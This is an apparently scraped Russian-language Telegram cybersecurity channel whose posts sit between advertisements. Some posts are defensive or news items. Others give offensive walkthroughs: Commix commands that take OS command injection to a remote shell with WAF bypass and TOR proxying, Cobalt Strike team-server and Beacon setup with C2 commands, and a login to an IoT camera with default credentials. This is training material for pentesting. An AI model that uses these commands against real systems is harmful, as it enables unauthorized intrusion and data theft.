CodeGuard: CyberSec Edition

Анализ безопасности веб-проектов 📊 Крэш-курс по техникам аудита безопасности веб-проектов. После прохождения курса вы освоите: общие знания относительно рисков, сопровождающих современные интернет-приложения; методики анализа безопасности клиент-серверных приложений; методики анализа кода; архитектурный анализ; практики разработки защищенных приложений. Начальные требования:

Для успешного прохождения курса требуются общие знания в области веб-технологий: что из себя представляет язык гипертекстовой разметки, как реализуется клиент-серверное взаимодействие, что такое tcp/ip.

👩‍💻 Проходим курс здесь 😈 CyberSec Edition | Чат

Хочешь зарабатывать с ИИ? Сейчас очень взрывают видео с ИИ моделями-красотками, видео залетают на миллионы. Ты можешь понять структуру создания этих моделей, зайдя в этот канал. В нем уже рассказали, как заработать с этих красоток! Не упускай возможности заскочить в последний вагон трендов, заходи и зарабатывай!

OS Command Injection через Commix: от параметра до RCE 💀 Веб-приложение пингует сервер? Принимает ip=127.0.0.1? А если вместо этого ip=127.0.0.1; id — получишь выполнение команд? Commix автоматизирует поиск и эксплуатацию OS Command Injection до полного RCE. 1️⃣ В чём суть Commix ищет и эксплуатирует OS Command Injection (classic, blind, time-based) и позволяет выполнять системные команды, получать shell и закрепляться на сервере. 2️⃣ Полная практика

# 1. Базовый скан GET-параметра
commix -u "http://target.com/ping.php?ip=127.0.0.1" --batch

# 2. Проверка POST-запроса
commix -u "http://target.com/ping.php" --data="ip=127.0.0.1" --batch

# 3. Указываем конкретный параметр
commix -u "http://target.com/ping.php?ip=127.0.0.1" -p ip

# 4. Выполнение команды
commix -u "http://target.com/ping.php?ip=127.0.0.1" --os-cmd="whoami"

# 5. Получаем pseudo-shell
commix -u "http://target.com/ping.php?ip=127.0.0.1" --os-shell

3️⃣ Выводы Commix в реале

[INFO] OS Command Injection vulnerability detected
[INFO] Payload: ;id;
[INFO] Current user: www-data
[INFO] Operating system: Linux

4️⃣ Продвинутые фишки

# Blind / Time-based injection
commix -u URL --technique=t --time-sec=5

# Обход WAF
commix -u URL --tamper=space2ifs,backticks

# User-Agent spoofing
commix -u URL --random-agent

# Прокси / TOR
commix -u URL --proxy=socks5://127.0.0.1:9050

🧠 Где тренироваться: DVWA, bWAPP, Metasploitable2, Hack The Box (old-school boxes) Полезно? ❤️ — Да 👍 — Нет 😈 CyberSec Edition | Чат

🤡 Сколько раз «взламывали Пентагон» на самом деле? Короткий ответ: точного числа никто не назовёт — часть инцидентов засекречена, часть считается «обычными» атаками, а десятки тысяч «взломов» идут в рамках легальных баг-баунти и тестов. Но есть несколько показательных историй и официальных цифр, которые ломают миф про «неприступную крепость». Реальные громкие взломы (которые признали) 1999 — Джонатан Джеймс (C0mrade), 15 лет.

Получил доступ к системам Пентагона и другим сетям Минобороны США, перехватывал трафик и данные, кейс считается первым публично признанным взломом Пентагона.

2001–2002 — «безработный из Лондона» (дело Гари Маккиннона).

Несколько раз проникал в сети армии, флота, NASA и Минобороны, получал права администратора, удалял файлы и ставил удалённый доступ RemotelyAnywhere; пострадало около сотни военных и космических машин.

2008 — заражённая флешка на базе США.

В ноутбук армии США на Ближнем Востоке вставили флешку с вредоносом, тот распространился по обычным и секретным сетям Пентагона — это назвали «крупнейшим взломом сети Пентагона» на тот момент и пересмотрели стратегию киберзащиты.

2015 — компрометация почтовой системы военного командования.

Экс‑глава объединённого комитета начальников штабов США заявлял, что «российские хакеры» взломали электронную почту структур Пентагона в августе 2015 года.​

Параллельно — многолетние утечки и атаки на смежные системы.

Похищение данных о F‑35, кража 24 тыс. секретных файлов в 2011 году, взломы NASA, армейских и ведомственных сетей — всё это не всегда формально именуют «взломом Пентагона», но по факту бьют по инфраструктуре Минобороны США.

«12 000+ взломов» — о чём на самом деле цифры К концу 2020 года Минобороны США зафиксировало более 12 тысяч найденных уязвимостей через платформы вроде HackerOne — это запуски контролируемых тестов и баг‑баунти, а не «успешные атаки врага». Участники находили баги во внешних системах, веб‑сервисах и инфраструктуре Пентагона, получая от 100 до 15 000 долларов за каждую критичную уязвимость, в отдельных конкурсах за считанные минуты успев обнаружить сотни проблем. То есть формально «взломы» там происходят десятки тысяч раз, но большая часть — легальные, согласованные проникновения ради укрепления защиты, а не шпионские операции. 😈 CodeGuard | Chat

Кибербезопасность теперь в Telegram! Тот самый канал, которого будет достаточно для того, чтобы стать настоящим безопасником абсолютно бесплатно! 🧠 Пакет Знаний – @study_security 📌 Инструменты, гайды, шпаргалки, книги и тренажеры для белых хакеров.

Как ломают камеры через интернет Эту фигню называют IoT-апокалипсисом: миллионы камер, роутеров и 'умных' устройств висят в сети с паролями admin/admin. Их взламывают не через навороченные эксплойты, а через простейшие методы. 🛠 Типичные векторы атаки:

▶️ Brute-force - перебор стандартных паролей (admin, 12345, пустой). ▶️ Поиск уязвимостей в веб-интерфейсе - старые версии ПО, injection-дыры. ▶️ Шпионские облачные сервисы - доступ к данным через 'левые' китайские платформы. ▶️ Ботнеты (вроде Mirai) - заражают устройства для DDoS-атак.

Демонстрация (для исследования!):

# Пример запроса к уязвимой камере (изменённый)
curl -X POST "http://192.168.1.1/login.cgi" \
  -d "username=admin&password=admin"
# Ответ: 'OK' и сессионная кука.
# Далее доступ к live-стриму: rtsp://admin:@192.168.1.1:554/stream1

Кто виноват?

- Производители, которые пашут на удешевление. - Пользователи, которые не меняют пароли. - Исходники прошивок, полные говна.

Что делать?

▶️ Менять пароль по умолчанию. ▶️ Отключать UPnP и WPS. ▶️ Выпиливать камеру из публичного интернета (без проброса портов). ▶️ Ставить обновления, если они вообще есть.

Shodan - поисковик дыр 😈 CodeGuard | Chat

👩‍💻 Хватит учить только синтаксис, начинай делать реальные проекты! Python Ready — авторский канал, где Python перестаёт быть только теорией и становится рабочим инструментом. Мини-проекты, боты, советы, разборы задач, гайды и шпаргалки для каждого программиста. 🔥 Советую подписаться: @python_ready

Cobalt Strike: инструмент для эксплуатации и управления доступом ⚔️ При успешном проникновении в сеть нужен инструмент для контроля и дальнейшей эксплуатации. Cobalt Strike - это платформа для моделирования угроз и управления доступом (command & control), которая позволяет злоумышленнику закрепиться в системе и передвигаться по сети. Используется в легальном тестировании на проникновение для моделирования действий продвинутых угроз (APT). Cobalt Strike работает с различными "маяками". Вот основные типы:

🔵HTTP/HTTPS Beacon: Наиболее распространён. Имитирует легитимный веб-трафик, общается с сервером команды и управления (C2) через HTTP-запросы. 🔵DNS Beacon: Использует DNS-запросы для скрытого канала связи, часто обходит простые веб-фильтры. 🔵SMB Beacon: Коммуницирует через именованные каналы (named pipes), что полезно для внутреннего перемещения в доменной среде. Payload-ы: Эксплойты для доставки Beacon, такие как исполняемые файлы (exe), документы Office с макросами или скрипты PowerShell.

Базовый сценарий: Развёртывание HTTPS Beacon Представьте, что вы специалист по безопасности (пентестер) и после фишинга получили доступ к рабочей станции в целевой сети. Теперь нужно установить стабильный канал управления. 1️⃣ Настройка Team Server (C2) Cobalt Strike разворачивается на сервере атакующего (Team Server), который принимает подключения от Beacon.

# Запуск Team Server (на сервере атакующего)
./teamserver [VPS_IP] [Shared_Password] [Profile_File]

2️⃣ Создание Payload и запуск Beacon В клиенте Cobalt Strike создаётся вредоносный пакет (payload) для целевой системы.

# Генерация исполняемого файла (exe) с HTTPS Beacon
Attacks → Packages → Windows Executable (S)
Выбор Listener: HTTPS, указание домена C2 и порта.

После доставки payload на цель (например, через фишинг) и его выполнения, на Team Server приходит "callback" от Beacon. 3️⃣ Взаимодействие и управление В клиенте появится новая сессия. Теперь можно выполнять команды, загружать модули, перемещаться по сети. Пример базовых команд в Beacon:

shell whoami          # Выполнить системную команду
upload /tmp/tool.exe # Загрузить файл на цель
download secret.txt  # Скачать файл с цели
portscan 10.10.0.0/24 445 # Просканировать сеть на порт 445

Результат (пример):

Beacon established to WORKSTATION-01\jdoe (High Integrity)

Вывод: Beacon успешно внедрён в целевую систему под учётной записью пользователя с высоким уровнем привилегий. Это точка опоры для дальнейшей атаки. Как это работает изнутри:

🔵Malleable C2 Profile: Конфигурационный файл, который маскирует трафик Beacon под легитимные сервисы (например, под запросы к Google или Microsoft). 🔵Стадия (Staging): Малый начальный payload (stager) загружает основной payload (Beacon) в память, часто минуя диск. 🔵Сон (Sleep) и Jitter: Beacon не активен постоянно. Он "спит" заданные интервалы и добавляет случайную задержку (jitter), чтобы усложнить обнаружение.

Защита: Как обнаружить и противостоять?

🔴Мониторинг сетевого трафика. Ищите аномальные DNS-запросы, регулярные HTTPS-соединения на нестандартные порты и несоответствие трафика заявленным User-Agent. 🔴Анализ процессов в памяти. Инструменты вроде EDR (Endpoint Detection and Response) могут обнаруживать инъекции кода и подозрительные действия PowerShell. 🔴Регулярное обучение пользователей для предотвращения успешных фишинговых атак - первоначального вектора доставки. 🔴Строгое сегментирование сети и применение принципа минимальных привилегий (Least Privilege) для ограничения перемещения атакующего.

😈 CodeGuard | Chat

Хочешь в хакинг? Тогда читай мой канал. В нём ты узнаешь с чего начать, увидишь интересные кейсы из социальной инженерии, прочувствуешь все прелести пентеста на себе прочитаешь про забавные случаи из мира ИБ и посмеёшься над тупыми инфоцыгами. 🐈‍⬛Дорожная карта со стажёра до мидла 🐈‍⬛ О важности методологии в ИБ 🐈‍⬛ Переиграли мошенника и угнали его акк Сфинкс. Подписаться.

Настройка локального кэша с ufw в Ubuntu: скорость без дыр Кэширование на локальной машине может серьезно разогнать работу приложений, но если сделать это по-дебильному - любой желающий сможет заглянуть в ваш кэш через сеть. Связка Memcached (или Redis) и ufw решает это, давая скорость и базовую безопасность. Memcached - простая, но мощная система кэширования данных в оперативной памяти. По умолчанию она слушает на всех интерфейсах, что - полная хрень для локальной машины. 🛡Зачем связывать с ufw?

➡️ Блокировка внешнего доступа к порту кэша (11211) ➡️ Разрешение доступа только с localhost или определенных внутренних IP ➡️ Защита от случайного "открытия" сервиса в сеть ➡️ Простая и понятная конфигурация правил

⚡️ Быстрая настройка связки: 1️⃣ Установка Memcached и ufw:

sudo apt update
sudo apt install memcached ufw

2️⃣ Базовая конфигурация Memcached (ограничение на localhost):

sudo nano /etc/memcached.conf
# Найти строку с `-l 127.0.0.1` и убедиться, что она раскомментирована
sudo systemctl restart memcached

3️⃣ Настройка ufw для полной блокировки внешнего доступа:

sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow ssh
sudo ufw allow from 127.0.0.1 to any port 11211
sudo ufw enable
sudo ufw status verbose

💡 Для более сложных сценариев (например, доступ с другого сервиса в приватной подсети) можно настроить правило точнее, например:

sudo ufw allow from 192.168.1.0/24 to any port 11211

🚀 Официальный сайт Memcached 😈 CodeGuard | Chat

🤖 Инструменты для OSINT и разведки информации Если ты занимаешься анализом данных, киберразведкой или цифровой атрибуцией, вот набор актуальных инструментов для добычи и систематизации открытой информации:

1) Maltego — мощный инструмент для визуализации связей между людьми, доменами и организациями. 2) theHarvester — поиск e-mail, доменов и IP через публичные источники. 3) SpiderFoot — автоматический фреймворк OSINT для поиска по более чем 100 источникам. 4) Recon-ng — модульный инструмент для сбора информации через API-сервисы. 5) Shodan — "поисковик хакеров", индексирует IoT, камеры, серверы. 6) Censys — глобальный поиск по онлайн-устройствам и сертификатам SSL. 7) Amass — автоматический сбор поддоменов и сетевых связей. 8) FOCA — извлечение метаданных из документов и изображений. 9) ExifTool — анализ и извлечение метаданных из файлов и фото. 10) Creepy — геолокация пользователей по фото и соцсетям. 11) GHunt — исследование Google-аккаунтов по публичным данным. 12) Sherlock — поиск аккаунтов по имени пользователя на сотнях сайтов. 13) Holehe — проверка, на каких сервисах зареган email. 14) Social-Analyzer — анализ профилей человека по соцсетям и онлайн-сервисам. 15) Metagoofil — извлечение документов из домена и анализ их метаданных. 16) DNSDumpster — интерактивный поиск DNS-записей и поддоменов. 17) Wayback Machine — просмотр старых версий сайтов и утечек страниц. 18) WhoisXML API — WHOIS и IP-аналитика для доменов и инфраструктуры. 19) IntelX — поиск утечек, ключей API и паролей из открытых источников. 20) ReconDog — легкий и гибкий инструмент для первичного сбора данных.

Этот OSINT-набор помогает работать "в белую": исследовать следы, находить инсайты и выстраивать аналитическую картину события. Будь орлом, поставь 👍 😈 CodeGuard | Chat

Приглашаем специалистов по кибербезопасности в канал “MONT и партнеры”. Для вас мы сделали специальную рубрику #ИБ_разбор. В ней рассматриваем новые продукты и сервисы, помогаем разобраться: кому и зачем будет полезно каждое из решений. Читайте в канале: • Kaspersky Endpoint Security: какую версию выбрать для защиты от сложных угроз • Как построить отказоустойчивую сеть для распределенных филиалов с SD-WAN • NGFW в России — миграция продолжается: взгляд изнутри от «Лаборатории Касперского» • Почта и веб без вирусов и атак: как исключить риски бизнеса? • Почему даже корпорации теряют данные: эксперт MONT о причинах утечек и защите бизнеса. 👉 Подписывайтесь @komandamont

🧠 Zerolog: быстрая и структурированная логика логов Zerolog — это сверхэффективная open-source библиотека для структурированного логирования на Go. Она спроектирована для минимального потребления памяти и скорости, которая в разы выше классических логгеров вроде logrus или zap. Zerolog использует JSON в качестве формата по умолчанию, что позволяет легко интегрировать логи в системы вроде ELK, Loki, Datadog или OpenSearch. ⚙️ Ключевые особенности Zerolog:

▶️ Формат JSON без аллокаций и отражений (reflection-free). ▶️ Поддержка уровней логирования (debug, info, warn, error, fatal, panic). ▶️ Встроенные timestamp’ы, stack trace и caller info. ▶️ Простая интеграция с context.Context для tracing’а. ▶️ Поддержка chainable API — декларативный стиль. ▶️ Совместимость с OpenTelemetry и структурными парсерами.

⚡️ Быстрый старт с Zerolog: Установка:

go get github.com/rs/zerolog/log

Использование:

package main

import "github.com/rs/zerolog/log"

func main() {
    log.Info().Str("service", "auth").Msg("Server started")
}

🟢Подходит для микросервисов, CLI и облачных приложений. 🟢Совместим с Docker, Kubernetes и Serverless инфраструктурой. 🟢Простое масштабирование логов через JSON pipeline.

💻 Репозиторий GitHub 😈 CodeGuard: PySec Edition | Чат

Хочешь тестовое задание? Получи RAT!! Северокорейские хакеры снова в деле — на этот раз они притворяются рекрутерами, чтобы заманивать разработчиков в ловушку. Под видом тестовых заданий на позицию JS или Python‑программиста “работодатель” присылает проект, который нужно запустить и доработать. Но вместо безобидного кода внутри прячется загрузчик трояна удалённого доступа (RAT). Исследователи из ReversingLabs выяснили, что злоумышленники распространяют заражённые пакеты через npm и PyPI, а кампания идёт уже с прошлого года. Всего найдено 192 вредоносных пакета, объединённых под именем Gragphalgo. В одном из случаев пакет bigmathutils был безопасен до версии 1.1.0, а затем превратился в ловушку и вскоре был удалён, чтобы скрыть следы. Хакеры создают фейковые компании в крипто‑сфере, публикуют вакансии на платформах вроде LinkedIn, Reddit и Facebook, и используют GitHub‑организации, чтобы придать всему реалистичный вид. По данным экспертов, за этой схемой, скорее всего, стоит печально известная группировка Lazarus, ранее замеченная в атаках на криптовалютные проекты. Ссылка на новость ➝ [клац] 😈 CodeGuard | Chat

⚡️Слита База из 1000+ топовых курсов и материалов для айтишников Отсортировали их для вашего удобства и выложили в телеграм-каналы по категориям: 🖥 Python — 1558+ материалов 👩‍💻 Frontend — 1241+ материалов 👩‍💻 Backend — 1095+ материалов 🤖 Нейросети – 855+ материалов ⚙️ Программы — 978+ материалов 📚 Книги по IT — 779+ материалов Всё лучшее про IT бесплатно — уже на Базе 🚀

🔍 EyeWitness - зоркий глаз для веб-ресурсов Сегодня на разборе - EyeWitness. Это не просто сканер, а настоящий OSINT-детектив, который автоматически делает скриншоты веб-страниц, собирает заголовки и идентифицирует технологии. Идеальный инструмент, чтобы быстро "увидеть" что скрывается за сотней IP-адресов или доменов. ⚡️ Что такое EyeWitness? EyeWitness - это инструмент для пассивной разведки, который берет список сайтов, загружает их и детально анализирует. Он экономит часы ручной работы, предоставляя готовый визуальный отчет. Он умеет:

🔴делать скриншоты веб-страниц и веб-приложений; 🔴собирать метаданные: заголовки, коды ответов, технологии (через Wappalyzer); 🔴распознавать формы входа, чтобы быстро находить уязвимые точки; 🔴генерировать удобный HTML-отчет, где всё разложено по полочкам.

📖 Как использовать EyeWitness?

🔵Устанавливаем (проще через клонирование репозитория GitHub). 🔵Подготавливаем файл со списком целей (IP или домены). 🔵Запускаем командой: ./EyeWitness -f targets.txt --web 🔵Ждем, пока инструмент обойдет все цели и сделает свою работу. 🔵Открываем красочный HTML-отчет и анализируем результаты.

💡EyeWitness превращает скучный список адресов в наглядную карту целей. Больше не нужно открывать каждый сайт вручную - за вас это сделает автоматический сыщик. 😈 CyberSec Edition | Чат

Занимайся расследованием киберпреступлений как рок-звезда 🎸

"Есть два вида компаний: те, что были взломаны, и те, что пока еще не знают, что были взломаны. А когда они по итогу узнают об этом - если им посчастливится - начинается отчаянная паника, которая быстро доходит до уровня руководства компании."

В этой книге в подробностях описывается подобный инцидент, расследование основанное на реальных событиях, начиная с первого сомнительного звонка, сделанного банком, атаки, до пика максимальной напряженности, вызванного предварительным криминалистическим анализом. 💠 Качай книгу → [Archive] 😈 CodeGuard | Chat

❗️Самые «имбовые» каналы в Telegram по мнению пользователей: Hardware Club — здесь вы узнаете, как даже с маленьким бюджетом собрать мощный ПК. Разгон железа, оптимизация системы, новинки, лайфхаки, обзоры, комплектующие, готовые сборки. Windows Club — этот канал удивит даже уверенного пользователя Windows. Бесплатные ключи активации, полезные софты, сервисы, фишки и нейросети. Linux Club — это мечта для пользователей Linux. Здесь вы найдёте всё, от полезных команд в терминале, до обучающих уроков, которые пригодятся даже профи. Apple Club — все фишки, лайфхаки, функции и свежайшие новости для iOS и macOS, собранные в одном канале. ⚡️Даже Стив Джобс бы подписался на эти каналы, пользуйтесь

Страны с наибольшим числом хакеров на душу населения 💻 В мире хакеров нет точной статистики по их численности на душу населения, поскольку многие действуют анонимно, а данные собираются по IP-адресам атак от компаний вроде Akamai и Group-IB. Тем не менее, по рейтингам лидируют небольшие страны вроде Румынии и Тайваня, где доля кибератак на население выше из-за развитой IT-сферы и экономических стимулов — Румыния генерирует около 2,8% мирового трафика атак при 19 млн жителей. Где хакеры опаснее всего? Самые опасные хакеры выходят из Китая, России и Северной Кореи, где атаки часто спонсируются государством и бьют по инфраструктуре или шпионажу. Китай доминирует с 41% глобальных атак, включая сложные APT-группы против корпораций вроде Apple. Северокорейские группы фокусируются на банках и энергетике, а российские — на политических DDoS. Примеры и тенденции Румыния известна как "столица киберпреступников" благодаря городам вроде Рымнику-Вылча, где бедность толкает молодёжь в хакинг. В 2024 году Бельгия и Франция стали главными целями из-за выборов, но атаки шли из Азии и Восточной Европы. Для защиты советуют двухфакторку и сервисы вроде StormWall — абсолютные лидеры вроде Китая и США опасны объёмом, но на душу населения уступают "цифровым карликам". 😈 CodeGuard | Chat

🔥 ОТБОРОНЫЙ FrontЪ — это элита IT-контента в Telegram! ✈️ Канал, где собирается всё самое лучшее Что внутри: ⭐ ТОПОВЫЕ интервью ⭐ Отборные курсы ⭐ IT-инсайды ⭐ Полезные материалы Интервью со спецами и платные бесплатные курсы — эксклюзив, которого нет в открытом доступе.

P.S. Пока ты читаешь — кто-то другой уже прокачивается.